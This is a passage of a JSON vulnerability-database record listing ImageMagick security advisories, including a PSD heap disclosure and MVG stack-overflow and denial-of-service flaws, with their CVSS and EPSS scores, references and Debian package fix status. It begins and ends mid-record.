"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55160", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55160" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hgw-6x87-578x", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-13T14:26:33Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hgw-6x87-578x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55160", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55160" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111104", "reference_id": "1111104", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111104" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2388253", "reference_id": "2388253", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2388253" }, { "reference_url": "https://github.com/advisories/GHSA-6hgw-6x87-578x", "reference_id": "GHSA-6hgw-6x87-578x", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6hgw-6x87-578x" }, { "reference_url": "https://usn.ubuntu.com/7756-1/", "reference_id": "USN-7756-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7756-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" } ], "aliases": [ "CVE-2025-55160", "GHSA-6hgw-6x87-578x" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a2qm-vkc3-qkd5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21827?format=api", "vulnerability_id": "VCID-acsa-1uwk-fqee", "summary": "ImageMagick has Possible Heap Information Disclosure in PSD ZIP Decompression\n### Description\nA heap information disclosure vulnerability exists in ImageMagick's PSD (Adobe Photoshop) format handler. When processing a maliciously crafted PSD file containing ZIP-compressed layer data that decompresses to less than the expected size, uninitialized heap memory is leaked into the output image.\n\n### Expected Impact\nInformation disclosure leading to potential exposure of sensitive data from server memory.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24481", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03914", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04003", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03991", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0387", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0386", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03881", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03909", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03926", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03957", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03934", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03928", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14453", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24481" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24481", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24481" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/51c9d33f4770cdcfa1a029199375d570af801c97", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/51c9d33f4770cdcfa1a029199375d570af801c97" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-96pc-27rx-pr36", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:39:38Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-96pc-27rx-pr36" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24481", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24481" }, { "reference_url": "https://github.com/advisories/GHSA-96pc-27rx-pr36", "reference_id": "GHSA-96pc-27rx-pr36", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-96pc-27rx-pr36" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-24481", "GHSA-96pc-27rx-pr36" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-acsa-1uwk-fqee" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24109?format=api", "vulnerability_id": "VCID-b43n-3d1g-u3fe", "summary": "ImageMagick's failure to limit MVG mutual causes Stack Overflow\nMagick fails to check for circular references between two MVGs, leading to a stack overflow.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68950.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68950.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68950", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06636", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06625", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06475", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06467", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06532", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06541", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06462", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06553", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06512", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06474", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06548", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06438", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68950" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68950", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68950" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:01Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426284", "reference_id": "2426284", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426284" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68950", "reference_id": "CVE-2025-68950", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68950" }, { "reference_url": "https://github.com/advisories/GHSA-7rvh-xqp3-pr8j", "reference_id": "GHSA-7rvh-xqp3-pr8j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7rvh-xqp3-pr8j" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j", "reference_id": "GHSA-7rvh-xqp3-pr8j", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:01Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-68950", "GHSA-7rvh-xqp3-pr8j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b43n-3d1g-u3fe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21980?format=api", "vulnerability_id": "VCID-b5pd-kk97-gban", "summary": "ImageMagick: Converting multi-layer nested MVG to SVG can cause DoS\nMagick fails to check for multi-layer nested mvg conversions to svg, leading to DoS.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24484.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24484.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24484", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04656", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04614", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04468", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04498", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04477", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0453", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04541", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04524", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04489", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04515", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17539", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24484" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24484", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24484" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/0349df6d43d633bd61bb582d1e1e87d6332de32a", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/0349df6d43d633bd61bb582d1e1e87d6332de32a" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wg3g-gvx5-2pmv", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wg3g-gvx5-2pmv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24484", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24484" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442085", "reference_id": "2442085", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442085" }, { "reference_url": "https://github.com/advisories/GHSA-wg3g-gvx5-2pmv", "reference_id": "GHSA-wg3g-gvx5-2pmv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wg3g-gvx5-2pmv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-24484", "GHSA-wg3g-gvx5-2pmv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b5pd-kk97-gban" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21017?format=api", "vulnerability_id": "VCID-cbqr-aybx-d3e6", "summary": "ImageMagick has Use After Free in MSLStartElement in \"coders/msl.c\"\nA crafted MSL script triggers a 